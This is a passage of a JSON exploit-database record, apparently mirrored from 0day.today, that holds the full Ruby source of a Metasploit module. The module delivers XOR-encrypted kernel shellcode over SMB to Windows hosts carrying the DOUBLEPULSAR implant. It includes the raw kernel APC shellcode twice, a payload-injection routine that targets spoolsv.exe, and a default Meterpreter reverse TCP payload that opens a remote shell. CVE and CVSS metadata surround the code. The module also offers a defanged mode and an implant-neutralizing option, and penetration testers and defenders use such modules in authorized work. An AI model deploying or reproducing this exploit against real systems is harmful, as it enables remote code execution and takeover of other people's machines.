print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-27] #"}, "lastseen": "2021-10-26T22:29:31", "differentElements": ["sourceData"], "edition": 57}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "b85d525ce7f749dde47247381fb5b32c", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-10-27T22:19:46", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:42030", "EDB-ID:42031", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-27786", "1337DAY-ID-27802", "1337DAY-ID-33895", "1337DAY-ID-27752"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:142602"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700059.PRM", "MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96703", "SMNTC-96704", "SMNTC-96707", "SMNTC-96706", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}], "modified": "2021-10-27T22:19:46", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-10-27T22:19:46", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n 